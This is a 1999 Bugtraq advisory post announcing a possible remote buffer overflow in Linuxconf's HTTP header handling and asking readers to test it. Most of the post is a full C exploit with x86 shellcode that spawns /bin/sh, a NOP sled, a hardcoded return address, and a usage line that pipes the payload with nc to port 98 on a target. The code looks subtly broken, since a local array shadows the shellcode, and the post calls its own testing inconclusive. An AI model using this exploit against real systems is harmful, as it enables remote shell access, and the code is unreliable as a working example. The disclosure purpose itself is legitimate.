linux, säkerhet

4607233 1999-12-21  19:44  /108 rader/ Postmaster
Mottagare: Bugtraq (import) <8966>
Ärende: (Possible) Linuxconf Remote Buffer Overflow Vulnerability
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <19991221103114.C21283@securityfocus.com>
Date:         Tue, 21 Dec 1999 10:31:14 -0800
Reply-To: aleph1@SECURITYFOCUS.COM
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Elias Levy <aleph1@SECURITYFOCUS.COM>
X-To:         bugtraq@securityfocus.com, incidents@securityfocus.com
X-cc:         cert@cert.org, linuxconf@hub.xc.org, jack@solucorp.qc.ca 
             vuldb@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

There may exists a buffer overflow vulnerability in the Linuxconf
package shipped with some version of Linux systems. The vulnerability
may be in the program's handling of HTTP headers. Initial testing
with Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If other
can test the exploit and report their results it would be appreciated.

This is an example of what good can happen from sharing security
incident information. There have been reports in the INCIDENTS mailing
list for several months now of scans for port 98. Since no
publicly known major vulnerabilities existed in this service the
traffic was somewhat strange. After some digging around
Jon Starnaud <jon.starnaud@rci.com> was able to find this exploit.

If you are not subscribed to INCIDENTS and wish to share incident
information I suggest you sign up. If the vulnerability does exists
this would be the second vulnerability we discover thanks to sharing
incident information (the first one being sadmind).

http://www.securityfocus.com/forums/incidents/faq.html

/*

  linuxconf exploit by R00T-X (c) 1999

  USER_AGENT overflow x86
  should work on all linux's but you need to have
  network access to linuxconf

  greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me,
heh :P

  have fun with this but for EDUCATIONAL PURPOSES :)

  Usage:   (./linexp <offset>;cat)| nc targethost 98

 */

char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe8\xc0\xff\xff\xff/bin/sh\x00";

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 1025
#define NOP 0x90

void
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset,nop,i;
  unsigned long esp;
  char shell[1024+300];

  if(argc < 2)
  {
  fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);
  exit(0);
  }

  nop = 511;
  esp = 0xefbfd5e8;
  offset = atoi(argv[1]);

  memset(buf, NOP, BUFLEN);
  memcpy(buf+(long)nop, shell, strlen(shell));

  for (i = 256; i < BUFLEN - 3; i += 2)
{    *((int *) &buf[i]) = esp + (long) offset;
     shell[ sizeof(shell)-1 ] = 0;
}

 printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);

  printf("\r\n");

  return;
}


--
Elias Levy
Security Focus
http://www.securityfocus.com/
(4607233) ------------------------------------------(Ombruten)